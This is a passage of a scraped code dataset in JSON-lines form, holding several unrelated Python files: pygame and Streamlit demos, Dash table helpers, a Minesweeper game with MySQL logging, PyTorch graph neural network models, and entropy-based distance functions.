os\r\n\r\nSCREEN_WIDTH = 640\r\nSCREEN_HEIGHT = 480\r\n\r\n\r\nDEFAULT_FONT = \"Arial\"\r\nWHITE = (255,255,255)\r\nBLACK = (0,0,0)\r\nRED = (255,0,0)\r\nGREEN = (0,255,0)\r\nBLUE = (0,0,255)\r\nCYAN = (0,255,255)\r\nPURPLE = (255,0,255) \r\nYELLOW = (255,255,0)\r\nORRANGE = (255,100,0)\r\n\r\ndef main():\r\n pygame.init()\r\n main_surface = pygame.display.set_mode([SCREEN_WIDTH,SCREEN_HEIGHT])\r\n main_surface.fill(BLACK)\r\n display_text(main_surface,\"12\",12,RED,123,123)\r\n pygame.time.wait(5000)\r\n \r\n while(True):\r\n for event in pygame.event.get():\r\n if(event.type == pygame.QUIT):\r\n break\r\n main_surface.fill(BLACK)\r\n my_group.update()\r\n my_group.draw()\r\n pygame.display.flip()\r\n pygame.quit()\r\n\r\nclass Ball(pygame.sprit.Sprite):\r\n def __init__(self, position):\r\n self.image = pygame.image.load('ball.png')\r\n self.rect = self.image.get_rect()\r\n self.rect.center = position\r\n self.velocity = [1,1]\r\n \r\n def update(self):\r\n self.rect.move_ip(self.velocity)\r\n\r\ndef display_text(surface,text,size,p_color,x,y):\r\n font = pygame.font.SysFont(DEFAULT_FONT,size)\r\n text_surface = font.render(text,True,p_color)\r\n text_rect = text_surface.get_rect()\r\n text_rect.midtop = (x,y)\r\n surface.blit(text_surface,text_rect)\r\n pygame.display.flip()\r\n\r\nif(__name__ == \"__main__\"):\r\n main()","repo_name":"Nicholas-Mooney/pynotes","sub_path":"py folder/pygamepractice.py","file_name":"pygamepractice.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10370325929","text":"from random import choices\nfrom string import ascii_letters\n\nimport dash_bootstrap_components as dbc\nimport dash_html_components as html\nfrom dash_table import DataTable\n\n\ndef random_string():\n return ''.join(choices(ascii_letters, k=10))\n\n\ndef mk_card(title, obj, hint=''):\n obj_id = random_string()\n return dbc.Card(\n dbc.CardBody([\n html.H4(title, id=obj_id),\n dbc.Tooltip(hint, target=obj_id),\n html.Div([obj])\n ])\n )\n\n\ndef mk_empty_datatable(table_id):\n return DataTable(\n id=table_id,\n style_as_list_view=True,\n editable=False,\n filter_action=\"native\",\n sort_action=\"native\",\n sort_mode=\"multi\",\n page_action=\"native\",\n page_current=0,\n page_size=10,\n style_header={\n 'font-family': 'Rubik, sans-serif;',\n 'font-style': 'normal',\n 'font-weight': 'bold',\n 'font-size': '16px;',\n 'line-height': '22px;',\n 'display': 'flex;',\n 'align-items': 'center;',\n 'letter-spacing': '0.15px;',\n 'margin': '1px 9px;',\n 'backgroundColor': 'white',\n 'fontWeight': 'bold',\n 'textAlign': 'left'\n },\n style_cell={\n 'font-family': 'Roboto Mono, sans-serif;',\n 'font-style': 'normal',\n 'font-weight': 'normal',\n 'font-size': '14px;',\n 'line-height': '22px;',\n 'display': 'flex;',\n 'align-items': 'center;',\n 'letter-spacing': '0.15px;',\n 'backgroundColor': '#262421;',\n 'margin': '1px 9px;',\n 'flex': 'none;',\n 'order': '0;',\n 'textAlign': 'center'\n },\n style_cell_conditional=[\n {\n 'if': {'column_id': c},\n 'textAlign': 'left'\n } for c in ['ESPECIALIDADE_INTERNACAO']\n ]\n )","repo_name":"rgiglio/python-engeco","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4475564768","text":"from ants.engine import AntEngine\nimport pygame\nimport time\n\n\nclass FieldHandler(object):\n\n def __init__(self, resolution=(800, 800), grid_size=25, food_quant=100,\n spawn_ants=True, startants=25, colony_count=1):\n\n self.grid_size = grid_size\n\n # assuming square grid!!\n self.field_size = resolution[0] / self.grid_size\n\n self.engine = AntEngine(\n start_ants=startants,\n grid_size_x=self.grid_size,\n grid_size_y=self.grid_size,\n food_quant=food_quant,\n inf_food=False,\n min_food=5000,\n max_food=5000,\n spawn_ants=spawn_ants,\n ant_ai=True,\n colony_count=colony_count\n )\n\n self.grid = self.engine.grid\n\n self.run_engine = False\n\n def get_field(self, pos):\n '''calculate coordinates from click pos and return corresponding field\n from engine grid'''\n x = int(pos[0] / self.field_size)\n y = int(pos[1] / self.field_size)\n return self.grid.fields.get((x, y))\n\n def click(self, pos):\n '''add food to clicked field'''\n field = self.get_field(pos)\n if field is not None:\n field.food += 1000\n\n def right_click(self, pos):\n '''toggle clicked field blocked attribute'''\n field = self.get_field(pos)\n if field is not None:\n field.blocked = not field.blocked\n\n def colour_field(self, field):\n '''calculate colour of field from ant count, food and blocked attribute\n '''\n\n red = 0\n green = 0\n blue = 0\n\n field_surface = pygame.Surface(\n (self.field_size, self.field_size)\n )\n\n if field.is_home:\n green = 255\n\n if field.food > 0:\n red = 255\n\n if field.antcount < 0:\n field.antcount = 0\n\n ant_count = field.antcount\n ants_count = float(self.engine.ants_count)\n if ants_count != 0 and ant_count > 0:\n blue = int(10 * 255 * (ant_count / ants_count ** (0.7)))\n if blue > 255:\n blue = 255\n\n # blocked fields are white!\n if field.blocked:\n red = 255\n blue = 255\n green = 255\n\n pygame.draw.rect(\n field_surface,\n (red, green, blue, 0),\n (0, 0, self.field_size, self.field_size)\n )\n field_surface = field_surface.convert_alpha()\n\n pos = (\n field.x * self.field_size,\n field.y * self.field_size\n )\n\n return field_surface, pos\n\n def draw_fields(self, display):\n '''called from pygame_main, run engine and put coloured fields on\n display'''\n\n if self.run_engine:\n self.engine.tick()\n\n for field in self.grid.fields.values():\n field_surface, pos = self.colour_field(field)\n display.blit(field_surface, pos)\n\n return display\n","repo_name":"gandie/Ants","sub_path":"ants/pygame_adapter.py","file_name":"pygame_adapter.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"37947517213","text":"import openpyxl\n\n#link absolute file path\nwb = openpyxl.load_workbook(\"balance.xlsx\")\nws = wb['Sheet1']\n\n#created a generator object\nrows = ws.iter_rows(min_row=1,max_row=7,min_col=1,max_col=2)\n\nnames = []\nbalance = []\nfor a,b in rows:\n names.append(a.value)\n balance.append(b.value)\n\nprint(names)\nprint(balance)\n\ncolumns = ws.iter_cols(min_row=1,max_row=5,min_col=1,max_col=2)\n#Tuple for each column\nfor col in columns:\n print(col)\n\n#All rows and all columns\nrows = list(ws.rows)\ncolumns = list(ws.column)\n","repo_name":"jtmar28/Learning-Openpyxl","sub_path":"Iterate and Read Rows/iter_functions.py","file_name":"iter_functions.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72108078963","text":"# streamlit import 웹 퍼블리싱\nimport streamlit as st\nimport numpy as np\nimport pandas as pd\n\n# add 간단한 문자열을 출력\nst.title('안녕하세요')\nst.write('데이터프레임 구성, 테이블을 만들어 보자.')\nst.write(pd.DataFrame({\n 'column1': [1,2,3,4],\n 'column2': [10,20,30,40]\n}))\n\n# use magic\n\"\"\"\n# 안녕하세요, 신주연입니다.\n데이터프레임 구성, 테이블을 만들어 보자.\n\"\"\"\n\ndf = pd.DataFrame({\n '학 번': [2001,2002,2003,2004],\n '성 명': ['홍길동','춘향이','갑돌이','갑순이']\n})\ndf\n\n# 차트와 지도 그리기\n# line chart\nchart_data = pd.DataFrame(\n np.random.randn(20, 3),\n columns = ['A', 'B', 'C']\n)\n\nst.line_chart(chart_data)\n\n#plot map\nmap_data = pd.DataFrame(\n np.random.randn(10, 2) / [50, 50] + [36.643910, 127.487607],\n columns = ['lat', 'lon']\n)\n\nst.map(map_data)","repo_name":"jooyeon-shin/shin","sub_path":"appstream/first_app.py","file_name":"first_app.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"24274669541","text":"import pickle\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport numpy as np\nimport networkx as nx\nfrom scipy import sparse\nimport pylab as plt\nimport dateutil.parser as dparser\nimport re\n\ndef save_object(obj, filename):\n with open(filename, 'wb') as output: # Overwrites any existing file.\n pickle.dump(obj, output, 2)\n\ndef load_object(filename):\n output = 0\n with open(filename, 'rb') as fp:\n output = pickle.load(fp)\n return output\n\ndef edgelist2numEdge(edgelist):\n num_edges = len(set(edgelist))\n return num_edges\n\ndef edgelist2weights(edgelist):\n unique_edges = list(set(edgelist))\n weights = [0]*len(unique_edges)\n for edge in edgelist:\n weights[unique_edges.index(edge)] += 1\n return weights\n\ndef edgelist2degrees(edgelist):\n unique_nodes = []\n for (u,v) in edgelist:\n if u not in unique_nodes:\n unique_nodes.append(u)\n if v not in unique_nodes:\n unique_nodes.append(v)\n \n degrees = [0]*len(unique_nodes)\n for (u,v) in edgelist:\n degrees[unique_nodes.index(u)] +=1\n degrees[unique_nodes.index(v)] +=1\n return degrees\n\n\n\n\n\n\n\n\n","repo_name":"shenyangHuang/multiLAD","sub_path":"util/normal_util.py","file_name":"normal_util.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"10547873851","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\nfrom Models.BatchRegression import BatchRegression\nfrom Utils import Predictions\n\ndef r2(y_actual, y_predicted):\n y_bar = np.mean(y_actual)\n numerator = sum((y_actual - y_predicted)**2)\n dominator = sum((y_actual - y_bar)**2)\n r2 = 1 - (numerator/dominator)\n return r2\n\nn_samples = 100\nn_features = 1\nnoise = 0\nrandom_state = 42\nX, y = datasets.make_regression(n_samples=n_samples, n_features=n_features, noise=noise, random_state=random_state)\nplt.scatter(X,y, color='blue')\n\nw = BatchRegression.linear_regression(X,y)\ny_predicted = Predictions._compute_predictions_(X,w)\n\nr2 = r2(y, y_predicted)\nprint(r2)\nplt.plot(X, y_predicted, color='blue')\nplt.show()\n\n","repo_name":"mabushaera/OLR-WA_Project","sub_path":"VisualizedDemos/06R-Squared.py","file_name":"06R-Squared.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19256934539","text":"import random\r\nimport pymysql as sql\r\nimport time\r\n\r\n\r\n\r\nclass Square:\r\n '''\r\n This is the constructor. The instance variable counter will keep track of the number of bombs adjacent to the square.\r\n The instance variable bomb will keep track of whether the square contains a bomb or not. The instance variable open indicates\r\n whether the box has been opened or not. The flag variable is a user option, so they can mark squares they believe to be bombs\r\n '''\r\n\r\n def __init__(self, counter, bomb, open, flag):\r\n self.counter=counter\r\n self.bomb = bomb\r\n self.open = open\r\n self.flag = flag\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef initialize_array(num_bombs):\r\n '''\r\n This function does two things. It determines the counter values for each square. It also randomly allocates the bombs\r\n accross the minesweeper board\r\n '''\r\n\r\n \r\n # Generating an array of unique random values so that the mines can be allocated randomly to cells\r\n a = []\r\n for i in range(0, num_bombs):\r\n mine_location = random.randint(0, (max_rows * max_rows)-1)\r\n while mine_location in a:\r\n mine_location = random.randint(0, (max_rows * max_rows)-1)\r\n a.append(mine_location)\r\n\r\n # assigning bombs to the appropriate index within the matrix\r\n for i in range(0, len(a)):\r\n row = int(a[i] / max_rows)\r\n column = a[i] % max_rows\r\n M[row][column].bomb = \"B\"\r\n\r\n # finding the cells that do not have mines so we can update the instance counter variable for them\r\n for i in range(0, max_rows):\r\n for j in range(0, max_rows):\r\n if M[i][j].bomb != \"B\":\r\n\r\n # basically checking a 3x3 grid area around each of these cells\r\n for s in [i-1, i, i+1]:\r\n for k in [j-1, j, j+1]:\r\n\r\n # Conditions to make sure it does sure does not check element out of range of array\r\n if ((0 <= s < max_rows) and (0 <= k < max_rows) and M[s][k].bomb == \"B\"):\r\n M[i][j].counter = M[i][j].counter + 1\r\n \r\n # printing out a map of all the instance counter variables. This is to check if we properly updated the counter variables.\r\n for i in range(0, max_rows):\r\n for j in range(0, max_rows):\r\n if j == 0:\r\n print(\"\\n\")\r\n print(M[i][j].counter, end = ' ')\r\n print(\"\\n\")\r\n\r\n # prints out a map of where all the mines are located. This is to check if we properly updated the bomb variables.\r\n for i in range(0, max_rows):\r\n for j in range(0, max_rows):\r\n if j == 0:\r\n print(\"\\n\")\r\n print(M[i][j].bomb, end = ' ')\r\n\r\n print(\"\\n\")\r\n\r\n\r\ndef open_square(row,column):\r\n '''\r\n This function is enacted when the user wants to open a cell. It recursively goes through every cell from the intial\r\n point and stop running in one direction, once we reach a cell that holds a non-zero counter variable.\r\n '''\r\n\r\n global num_open_square\r\n global lost_flag\r\n\r\n # Checks if user put a logical numeric value and if the box is closed\r\n if(0 <= row < max_rows and 0 <= column < max_rows and M[row][column].open == \"X\"):\r\n\r\n # We first open up the cell the user specified, we also update the the number of opened squares by one\r\n M[row][column].open = \"O\"\r\n num_open_square = num_open_square + 1\r\n\r\n # If the user selected a bomb, the function ends and user loses\r\n if M[row][column].bomb == \"B\":\r\n lost_flag = 1\r\n # If the user selects a spaces that has a counter variable of 0, then we recursively check in all four directions\r\n # The recursion ends when we hit a counter variable that is a non-zero value\r\n elif M[row][column].counter == 0:\r\n open_square(row - 1, column)\r\n open_square(row + 1, column)\r\n open_square(row, column - 1)\r\n open_square(row, column + 1)\r\n \r\n \r\n\r\n\r\n#Type in user information\r\ndef intro_screen():\r\n '''\r\n This function requests the user for their personal information to see if they have an account. If they have an account,\r\n the function will let the user know and there will be no change to PLAYER_TBL. If the name is not recognized, then function\r\n will request email and insert this data into PLAYER_TBL\r\n '''\r\n global name\r\n \r\n\r\n # Connect to the local database\r\n db = sql.connect(\"localhost\", \"root\", \"Hog123er\", \"minesweeper\")\r\n\r\n # prepare a cursor object using cursor() method\r\n cursor = db.cursor()\r\n\r\n # Ask user for name\r\n name = input(\"Type in your name: \")\r\n\r\n # Identifying if the name the user typed in is already in the database\r\n query = \"SELECT * FROM PLAYER_TBL WHERE PLAYER_NAME LIKE ('%s')\" % name\r\n cursor.execute(query)\r\n result1 = cursor.fetchall()\r\n # The condition checks if nothing is returned, then the user has a unique name\r\n # Because user is unique, we will be requesting for the email addresss\r\n\r\n if (len(result1) == 0):\r\n email = input(\"Type in your email: \")\r\n\r\n # Inserting new unique name and email to table\r\n query2 = \"INSERT INTO PLAYER_TBL (PLAYER_NAME, PLAYER_EMAIL) VALUES ('%s', '%s')\" % (name, email)\r\n cursor.execute(query2)\r\n db.commit()\r\n\r\n # If our initial query statement did return a record back, that means the user typed in an existing name\r\n else:\r\n print(\"You are in our records!\")\r\n\r\n\r\n # query = \"INSERT INTO PLAYER_TBL (PLAYER_EMAIL, PLAYER_NAME) VALUES ('Raajesh@hotmail.com', 'Raajesh Arunachalam')\"\r\n query3 = \"SELECT * FROM PLAYER_TBL\"\r\n\r\n \r\n cursor.execute(query3)\r\n\r\n # disconnect from server\r\n db.close()\r\n\r\n # Test code below to make sure PLAYER_TBL is accurate\r\n result = cursor.fetchall()\r\n\r\n for r in result:\r\n print(r)\r\n\r\ndef end_game():\r\n '''\r\n Once game is complete, game statistics are written to database GAME_TBL, such as number of squares in the board, number\r\n of mines in the game, time taken from start to finish, and completion percentage\r\n '''\r\n global name\r\n\r\n # Connect to the local database\r\n db = sql.connect(\"localhost\", \"root\", \"Hog123er\", \"minesweeper\")\r\n\r\n # prepare a cursor object using cursor() method\r\n cursor = db.cursor()\r\n\r\n # Using the name provided by the user, to obtain the player_id associated with it\r\n # We do this so that we can use the player_id as a foreign key for the GAME_TBL table\r\n query = \"SELECT PLAYER_ID FROM PLAYER_TBL WHERE (PLAYER_NAME = '%s')\" % (name)\r\n cursor.execute(query)\r\n result = cursor.fetchall()\r\n player_id = result[0][0]\r\n \r\n\r\n # Populating after game statistics into GAME_TBL after the person has completed their game, whether they won or lost\r\n query2 = \"INSERT INTO GAME_TBL (PLAYER_ID,NUM_SQUARES,NUM_MINES,TIME,COMPLETION_PERC) VALUES (%d, %d, %d, %f, %f)\" \\\r\n % (player_id, total_square, num_bombs, end_time, num_open_square / (total_square-num_bombs) * 100)\r\n cursor.execute(query2)\r\n db.commit()\r\n\r\n #disconnect from the server\r\n db.close()\r\n\r\n\r\n\r\n# initial parameters\r\nname = ''\r\nnum_open_square = 0\r\nlost_flag = 0\r\nnum_bombs = 5\r\nM = []\r\nmax_rows = 5\r\nmax_rows = 5\r\n\r\n# To request user for personal information\r\nintro_screen()\r\n\r\n# Creates a max_rows X max_rows square matrix that is fully populated with Square instances\r\ntotal_square = max_rows * max_rows\r\nfor i in range(0, max_rows):\r\n M.append([])\r\n for j in range(0, max_rows):\r\n M[i].append(Square(0, 0, \"X\", 0))\r\n\r\n# Initiates where all the mines will be and adjusts the counter variables accordingly\r\ninitialize_array(num_bombs)\r\n\r\n# Starts the timer when the user first gets to the board\r\nstart_time = time.time()\r\n\r\n# Conditions it so that you will keep getting prompted until either you lose, or you win\r\nwhile (num_open_square < (max_rows*max_rows) - num_bombs):\r\n\r\n # This will print out the board. It will print out all the closed boxes and the boxes that are open with thier counter value\r\n for i in range(0, max_rows):\r\n for j in range(0, max_rows):\r\n if j == 0:\r\n print(\"\\n\")\r\n if M[i][j].open == \"X\":\r\n print(M[i][j].open, end=' ')\r\n else:\r\n print(M[i][j].counter, end=' ')\r\n \r\n \r\n print(\"\\n\")\r\n # request row and column information from user. We subtract one to make it more intuitive, since no counts from zero\r\n try:\r\n row = (int(input(\"Type in row: \")) - 1)\r\n column = (int(input(\"Type in column: \")) - 1)\r\n if 0 <= row < 5 and 0 <= column < 5:\r\n open_square(row, column)\r\n else:\r\n print(\"Out of bounds.\")\r\n except ValueError:\r\n print(\"Illogical value typed in. Please try again.\")\r\n\r\n # If lost_flag is 1, then it will reveal the cell with the bomb that you opened along with all the other cells you opened\r\n if lost_flag == 1:\r\n for i in range(0, max_rows):\r\n for j in range(0, max_rows):\r\n if j == 0:\r\n print(\"\\n\")\r\n if M[i][j].bomb == \"B\" and M[i][j].open == \"O\":\r\n print(M[i][j].bomb, end = ' ')\r\n elif M[i][j].open == \"X\":\r\n print(M[i][j].open, end=' ')\r\n else:\r\n print(M[i][j].counter, end=' ')\r\n # total time is calculated and printed out.\r\n print(\"\\n\")\r\n print(\"You lost!\")\r\n end_time = time.time() - start_time\r\n print(\"Total game time: %.2f\" % end_time)\r\n break\r\n\r\n# If the user opens up all the boxes, aside from the bombs, he wins\r\nif (num_open_square == (max_rows * max_rows) - num_bombs) and lost_flag == 0:\r\n print(\"You won!\")\r\n end_time = time.time() - start_time\r\n print(\"Total game time: %.2f\" % end_time)\r\n# Call function that writes game statistics to database\r\nend_game()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"arunach2/Minesweeper","sub_path":"Minesweeper.py","file_name":"Minesweeper.py","file_ext":"py","file_size_in_byte":9984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40507735472","text":"import torch\nfrom torch_geometric.nn import MessagePassing\nfrom torch_geometric.nn import global_add_pool, GENConv, DeepGCNLayer\nimport torch.nn.functional as F\nfrom torch.nn import ReLU\nfrom torch_geometric.nn.conv.gcn_conv import gcn_norm\nfrom ogb.graphproppred.mol_encoder import AtomEncoder, BondEncoder\n\n\ndef make_mask(batch, device):\n n = batch.shape[0]\n mask = torch.eq(batch.unsqueeze(1), batch.unsqueeze(0))\n mask = (torch.ones((n, n)) - torch.eye(n)).to(device) * mask\n count = torch.sum(mask)\n return mask, count\n\nclass Deepergcn_dagnn_dist(torch.nn.Module):\n def __init__(self, num_layers, emb_dim, drop_ratio=0.5, \n JK=\"last\", aggr='softmax', norm='batch', \n device=torch.device('cuda' if torch.cuda.is_available() else 'cpu')):\n super(Deepergcn_dagnn_dist, self).__init__()\n\n self.deepergcn_dagnn = DeeperDAGNN_node_Virtualnode(num_layers, emb_dim, drop_ratio, JK, aggr, norm)\n self.calc_dist = DistMax(emb_dim)\n\n def forward(self, batched_data, train=False):\n xs = self.deepergcn_dagnn(batched_data)\n mask_d_pred, mask, count = self.calc_dist(xs, batched_data.batch)\n return mask_d_pred, mask, count\n\n\nclass DistMax(torch.nn.Module):\n def __init__(self, emb_dim, device=torch.device('cuda' if torch.cuda.is_available() else 'cpu')):\n super(DistMax, self).__init__()\n self.fc = torch.nn.Linear(in_features=emb_dim, out_features=1)\n self.device = device\n\n def forward(self, xs, batch, train=False):\n d_pred = self.fc(torch.max(xs.unsqueeze(0), xs.unsqueeze(1))).squeeze()\n mask, count = make_mask(batch, self.device)\n\n if train:\n mask_d_pred = d_pred * mask\n else:\n mask_d_pred = F.relu(d_pred * mask)\n return mask_d_pred, mask, count\n\n\nclass Deepergcn_dagnn_coords(torch.nn.Module):\n def __init__(self, num_layers, emb_dim, drop_ratio=0.5,\n JK=\"last\", aggr='softmax', norm='batch',\n device=torch.device('cuda' if torch.cuda.is_available() else 'cpu')):\n super(Deepergcn_dagnn_coords, self).__init__()\n\n self.deepergcn_dagnn = DeeperDAGNN_node_Virtualnode(num_layers, emb_dim, drop_ratio, JK, aggr, norm)\n self.calc_dist = DistCoords(emb_dim)\n\n def forward(self, batched_data, train=False):\n xs = self.deepergcn_dagnn(batched_data)\n mask_d_pred, mask, count = self.calc_dist(xs, batched_data.batch)\n return mask_d_pred, mask, count\n\n\nclass DistCoords(torch.nn.Module):\n def __init__(self, emb_dim, device=torch.device('cuda' if torch.cuda.is_available() else 'cpu')):\n super(DistCoords, self).__init__()\n self.fc = torch.nn.Linear(in_features=emb_dim, out_features=3)\n self.device = device\n\n def forward(self, xs, batch, train=False):\n xs = self.fc(xs)\n d_pred = torch.cdist(xs, xs)\n mask, count = make_mask(batch, self.device)\n\n if train:\n mask_d_pred = d_pred * mask\n else:\n mask_d_pred = F.relu(d_pred * mask)\n return mask_d_pred, mask, count\n\n\nclass DAGNN(MessagePassing):\n def __init__(self, K, emb_dim, normalize=True, add_self_loops=True):\n super(DAGNN, self).__init__()\n self.K = K\n self.normalize = normalize\n self.add_self_loops = add_self_loops\n\n self.proj = torch.nn.Linear(emb_dim, 1)\n\n self._cached_edge_index = None\n\n def forward(self, x, edge_index, edge_weight=None):\n if self.normalize:\n edge_index, norm = gcn_norm( # yapf: disable\n edge_index, edge_weight, x.size(self.node_dim), False,\n self.add_self_loops, dtype=x.dtype)\n\n preds = []\n preds.append(x)\n for k in range(self.K):\n x = self.propagate(edge_index, x=x, norm=norm)\n preds.append(x)\n\n pps = torch.stack(preds, dim=1)\n retain_score = self.proj(pps)\n retain_score = retain_score.squeeze()\n retain_score = torch.sigmoid(retain_score)\n retain_score = retain_score.unsqueeze(1)\n out = torch.matmul(retain_score, pps).squeeze()\n return out\n\n\n def message(self, x_j, norm):\n return norm.view(-1, 1) * x_j\n\n def __repr__(self):\n return '{}(K={})'.format(self.__class__.__name__, self.K)\n\n def reset_parameters(self):\n self.proj.reset_parameters()\n\n\nclass DeeperDAGNN_node_Virtualnode(torch.nn.Module):\n def __init__(self, num_layers, emb_dim, drop_ratio=0.5, JK=\"last\", aggr='softmax', norm='batch'):\n '''\n emb_dim (int): node embedding dimensionality\n num_layers (int): number of GNN message passing layers\n '''\n\n super(DeeperDAGNN_node_Virtualnode, self).__init__()\n self.num_layers = num_layers\n self.drop_ratio = drop_ratio\n self.JK = JK\n # self.input_encode_manner = input_encode_manner\n\n if self.num_layers < 2:\n raise ValueError(\"Number of GNN layers must be greater than 1.\")\n\n self.atom_encoder = AtomEncoder(emb_dim)\n self.bond_encoder = BondEncoder(emb_dim=emb_dim)\n\n ### set the initial virtual node embedding to 0.\n self.virtualnode_embedding = torch.nn.Embedding(1, emb_dim)\n torch.nn.init.constant_(self.virtualnode_embedding.weight.data, 0)\n\n ### List of MLPs to transform virtual node at every layer\n self.mlp_virtualnode_list = torch.nn.ModuleList()\n\n self.dagnn = DAGNN(5, emb_dim)\n\n ###List of GNNs\n self.layers = torch.nn.ModuleList()\n for i in range(1, num_layers + 1):\n conv = GENConv(emb_dim, emb_dim, aggr=aggr, t=1.0, learn_t=True, learn_p=True, num_layers=2, norm=norm)\n if norm==\"batch\":\n normalization = torch.nn.BatchNorm1d(emb_dim)\n elif norm==\"layer\":\n normalization = torch.nn.LayerNorm(emb_dim, elementwise_affine=True)\n else:\n print('Wrong normalization strategy!!!')\n act = ReLU(inplace=True)\n\n\n layer = DeepGCNLayer(conv, normalization, act, block='res+', dropout=0)\n self.layers.append(layer)\n\n for layer in range(num_layers - 1):\n if norm==\"batch\":\n self.mlp_virtualnode_list.append(torch.nn.Sequential(torch.nn.Linear(emb_dim, emb_dim), torch.nn.BatchNorm1d(emb_dim), torch.nn.ReLU(), \\\n torch.nn.Linear(emb_dim, emb_dim), torch.nn.BatchNorm1d(emb_dim), torch.nn.ReLU()))\n elif norm==\"layer\":\n self.mlp_virtualnode_list.append(torch.nn.Sequential(torch.nn.Linear(emb_dim, emb_dim), torch.nn.LayerNorm(emb_dim, elementwise_affine=True), torch.nn.ReLU(), \\\n torch.nn.Linear(emb_dim, emb_dim), torch.nn.LayerNorm(emb_dim, elementwise_affine=True), torch.nn.ReLU()))\n\n def forward(self, batched_data):\n x, edge_index, edge_attr, batch = batched_data.x, batched_data.edge_index, batched_data.edge_attr, batched_data.batch\n\n edge_attr = self.bond_encoder(edge_attr)\n h = self.atom_encoder(x)\n\n h_list = []\n\n virtualnode_embedding = self.virtualnode_embedding(torch.zeros(batch[-1].item() + 1).to(edge_index.dtype).to(edge_index.device))\n\n h = h + virtualnode_embedding[batch]\n h = self.layers[0].conv(h, edge_index, edge_attr)\n\n h_list.append(h)\n for i, layer in enumerate(self.layers[1:]):\n h = layer(h, edge_index, edge_attr)\n\n ### update the virtual nodes\n ### add message from graph nodes to virtual nodes\n virtualnode_embedding_temp = global_add_pool(h, batch) + virtualnode_embedding\n\n ### transform virtual nodes using MLP\n virtualnode_embedding = F.dropout(self.mlp_virtualnode_list[i](virtualnode_embedding_temp), self.drop_ratio, training = self.training)\n\n h = h + virtualnode_embedding[batch]\n h_list.append(h)\n\n h = self.layers[0].act(self.layers[0].norm(h))\n h = F.dropout(h, p=0, training=self.training)\n\n h_list.append(h)\n h = h + virtualnode_embedding[batch]\n\n h = self.dagnn(h, edge_index)\n h_list.append(h)\n\n ### Different implementations of Jk-concat\n if self.JK == \"last\":\n node_representation = h_list[-1]\n elif self.JK == \"sum\":\n node_representation = 0\n for layer in range(len(h_list)):\n node_representation += h_list[layer]\n\n return node_representation\n","repo_name":"divelab/MoleculeX","sub_path":"molx/model/deepergcn_dagnn.py","file_name":"deepergcn_dagnn.py","file_ext":"py","file_size_in_byte":8625,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"75"} +{"seq_id":"12612927824","text":"import numpy as np\nimport scipy.sparse as sp\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.preprocessing import normalize\n\n\ndef calculate_entropy(p, alpha):\n \"\"\"\n Generalized Jensen-Shannon Divergence\n ref: https://arxiv.org/abs/1706.08671\n \"\"\"\n if not sp.issparse(p):\n p = sp.csr_matrix(p.ravel())\n\n if alpha == 0:\n H = p.shape[1] - 1\n elif alpha == 1:\n H = - np.sum(p.data * np.log(p.data))\n elif alpha == 2:\n H = 1 - (p.data ** 2).sum()\n else:\n H = ((p.data ** alpha).sum() - 1)/ (1 - alpha)\n return H\n\n\ndef calculate_max_entropy(h1, h2, pi1=0.5, pi2=0.5, alpha=2):\n \"\"\"\n Maximum entropy\n h1 : entropy of probability distribution p1\n h2 : entropy of probability distribution p2\n \"\"\"\n if alpha == 1:\n d_max = - pi1 * np.log(pi1) - pi2 * np.log(pi2)\n else:\n d_max = (pi1 ** alpha - pi1) * h1 + \\\n (pi2 ** alpha - pi2) * h2 + \\\n (pi1 ** alpha + pi2 ** alpha - 1)/(1 - alpha)\n return d_max\n\n\ndef distance_language(p1, p2, alpha=2, norm=True):\n \"\"\"\n Distance between two articles using Jensen-Shannon Divergence\n with given alpha parameter\n \"\"\"\n h1 = calculate_entropy(p1, alpha)\n h2 = calculate_entropy(p2, alpha)\n h12 = calculate_entropy(0.5 * p1 + 0.5 * p2, alpha=alpha)\n d_lang = h12 - (0.5 * h1) - (0.5 * h2)\n if norm:\n d_max = calculate_max_entropy(h1, h2, pi1=0.5, pi2=0.5, alpha=alpha)\n d_lang = d_lang / d_max\n return d_lang\n\n\ndef distance_language_cosine(p1, p2):\n \"\"\"\n Distance between two articles using cosine distance\n \"\"\"\n d_lang = (1 - cosine_similarity(p1, p2)).ravel()[0]\n return d_lang\n\n\ndef calculate_hamming_dist(topic_text_1, topic_text_2):\n \"\"\"\n Calculate Hamming distance between two topics text e.g.\n\n Examples\n ========\n calculate_hamming_dist('D.01', 'F.02') >> 2\n calculate_hamming_dist('F.01', 'F.02') >> 1\n calculate_hamming_dist('F.02', 'F.02') >> 0\n \"\"\"\n topic_text_1 = topic_text_1.replace('Stroke', '').replace('Tauopathies,', '')\n topic_text_2 = topic_text_2.replace('Stroke', '').replace('Tauopathies,', '')\n if topic_text_1[-1] == '.':\n topic_text_1 = topic_text_1[:-1]\n if topic_text_2[-1] == '.':\n topic_text_2 = topic_text_2[:-1]\n topic1, subtopic1 = topic_text_1.split('.')\n topic2, subtopic2 = topic_text_2.split('.')\n if topic1 == topic2 and subtopic1 == subtopic2:\n return 0\n elif topic1 == topic2 and subtopic1 != subtopic2:\n return 1\n else:\n return 